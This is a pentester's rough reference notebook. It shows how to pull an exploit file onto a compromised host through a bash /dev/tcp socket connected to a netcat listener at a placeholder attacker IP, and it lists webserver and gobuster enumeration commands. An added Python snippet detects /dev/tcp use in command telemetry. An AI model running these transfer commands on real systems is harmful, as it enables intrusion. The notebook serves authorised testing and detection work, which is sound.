Useful Pentesting Commands (rough notebook)
This is more of a reference of lesser-used commands that I needed during engagements. You may find these useful as well, so here you go. More will be added over time, primarily as a handy reference for myself.
File Transfers
Inbound file transfer via Bash
There are several guides online on how to open a reverse shell over bash or send a file over bash, but not much on how to receive a file over bash. You can either learn all the fun stuff about streams and descriptors over here or use this as a shortcut.
This is useful in severely limited environments where nc, wget or other commands that make for easy file transfers are not available. If you have ever encountered a shell restricted with Firejail, you will surely appreciate this. It's particularly frustrating when you have a reverse shell on the target but it's hard to move your exploit files onto it. The following scenario assumes that:
- You have a listener on your attacker machine that is ready to send the exploit file.
- You have nc on your attacker machine (duh).
- You already have a pre-established shell or reverse-shell to the target.
Attacker's machine:
$ nc -nlvp 4445 < exploit.py
The above command waits and sends the contents of exploit.py to whoever connects to your machine on port 4445.
On the target machine, assuming you already have another reverse shell:
exec 3<> /dev/tcp/<ATTACKER IP>/4445; while read -r 0<&3; do printf '%s\n' "$REPLY" >> /tmp/our_exploit.txt; done;
This opens a socket connection to your attacker machine and binds it to file descriptor 3.
We then read line by line from descriptor 3 and append each reply to /tmp/our_exploit.txt. The read -r prevents backslash interpretation so that the destination file is identical to the one being sent.
You can now kill the socket connection and you should be able to find your file transferred over good old bash networking. There's likely a more efficient or shorter command to do this, but this worked fine as a quick and easy hack during my last engagement.
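From the defender's side, the same /dev/tcp trick is easy to spot in command-line records (shell history, auditd EXECVE arguments, EDR process telemetry). The following Python snippet is an added example, not part of the original notebook: it flags any /dev/tcp or /dev/udp pseudo-path, extracts the peer host and port, and notes whether the command also pins the socket to a persistent descriptor with exec N<>. The sample lines are constructed and the regexes are my own assumption of what is worth matching.

```python
import re

# Constructed sample command-line records (e.g. from bash history or
# auditd EXECVE output); the socket line is the receive command above.
SAMPLE_LINES = [
    "ls -la /tmp",
    "exec 3<> /dev/tcp/10.0.0.5/4445; while read -r 0<&3; "
    "do printf '%s\\n' \"$REPLY\" >> /tmp/our_exploit.txt; done;",
    "cat /dev/tcp_stats",      # similar prefix, not a bash socket path
    "python -m http.server 80",
    "exec 5<> /dev/udp/10.0.0.7/53; echo probe >&5",
]

# Bash resolves /dev/tcp/<host>/<port> and /dev/udp/<host>/<port> itself;
# these paths never exist on disk, so a hit is a strong signal.
DEV_SOCKET_RE = re.compile(r"/dev/(tcp|udp)/([A-Za-z0-9.\-]+)/(\d{1,5})\b")
# 'exec N<>' keeps the socket open on a numbered descriptor for the
# rest of the shell session rather than for a single command.
EXEC_FD_RE = re.compile(r"\bexec\s+\d+<>")


def find_dev_socket_usage(lines):
    """Return one finding per line that references a bash socket path."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = DEV_SOCKET_RE.search(line)
        if match is None:
            continue
        proto, host, port = match.groups()
        findings.append({
            "line_no": line_no,
            "proto": proto,
            "host": host,
            "port": int(port),
            "persistent_fd": EXEC_FD_RE.search(line) is not None,
        })
    return findings


if __name__ == "__main__":
    for hit in find_dev_socket_usage(SAMPLE_LINES):
        print(f"line {hit['line_no']}: {hit['proto']} to "
              f"{hit['host']}:{hit['port']} (exec fd: {hit['persistent_fd']})")
```

Shell history is trivially disabled by the person at the keyboard, so run this over execve-level telemetry (auditd, eBPF-based sensors) rather than ~/.bash_history for any real coverage.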
Simple Webserver
python -m 'http.server' 80
Preliminary Enumeration
gobuster dir -u http://<HOST> -w ./wordlist.txt
gobuster vhost -w <SUBDOMAIN_LIST.TXT> -u <TARGET_HOST> --append-domain